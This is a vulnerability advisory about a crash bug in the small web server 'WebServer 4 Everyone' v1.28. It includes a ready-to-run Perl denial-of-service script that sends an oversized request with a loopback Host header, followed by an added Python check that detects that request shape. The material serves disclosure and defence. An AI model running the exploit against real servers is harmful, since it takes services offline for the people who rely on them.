WebServer 4 Everyone is a small web server. If an
attacker sends a request longer than 2,000 characters
with the Host field set to 127.0.0.1, the server crashes.

Exploit:

#!/usr/bin/perl -w

use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1];
$evil = "A" x 2000;

print "Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host port\n";
print "Connecting…\n";
$socket = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => $port,
) || die "Connection failed.\n";

print "Attacking…\n";
print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n";

close($socket);
print "\nConnection closed. Finished.\n\n";
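
A check for this request shape, for use on a reverse proxy or over captured request heads. This is an added example, not part of the original advisory or SecurityOffice's code; the name inspect_request, the finding labels and the 1024-character limit are assumptions made here.

```python
import re

MAX_TARGET_LEN = 1024  # assumed limit; set to the longest legitimate URL you serve
LOOPBACK = re.compile(r"^(127\.\d+\.\d+\.\d+|localhost|\[?::1\]?)(:\d+)?$", re.I)

def inspect_request(raw, max_target=MAX_TARGET_LEN):
    """Return a list of findings for one raw HTTP request head from a remote peer."""
    findings = []
    # Keep only the head; accept both CRLF CRLF and bare LF LF terminators.
    head = raw.split(b"\r\n\r\n", 1)[0].split(b"\n\n", 1)[0].decode("latin-1")
    if "\n" in head.replace("\r\n", ""):
        findings.append("bare-lf")            # line endings that are not CRLF
    lines = head.replace("\r\n", "\n").split("\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        findings.append("malformed-request-line")
    elif len(parts[1]) > max_target:
        findings.append("oversized-target")   # the condition the advisory describes
    for line in lines[1:]:
        if line[:1] in (" ", "\t"):
            findings.append("folded-header")  # header line starts with whitespace
            line = line.lstrip()
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "host" and LOOPBACK.match(value.strip()):
            findings.append("loopback-host")  # loopback Host sent by a remote client
    return findings

# Constructed samples (not captured traffic).
SAMPLE_PAGE_SHAPED = b"GET /" + b"A" * 2000 + b" HTTP/1.1\n Host: 127.0.0.1\n\n"
SAMPLE_BENIGN = b"GET /index.html HTTP/1.1\r\nHost: www.example.test\r\n\r\n"

if __name__ == "__main__":
    for label, sample in (("page-shaped", SAMPLE_PAGE_SHAPED), ("benign", SAMPLE_BENIGN)):
        print(label, inspect_request(sample))
```

The Host line in the script above begins with a space, so a parser that treats leading whitespace as a continuation line will not see a Host header at all; the check reports that separately as folded-header.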


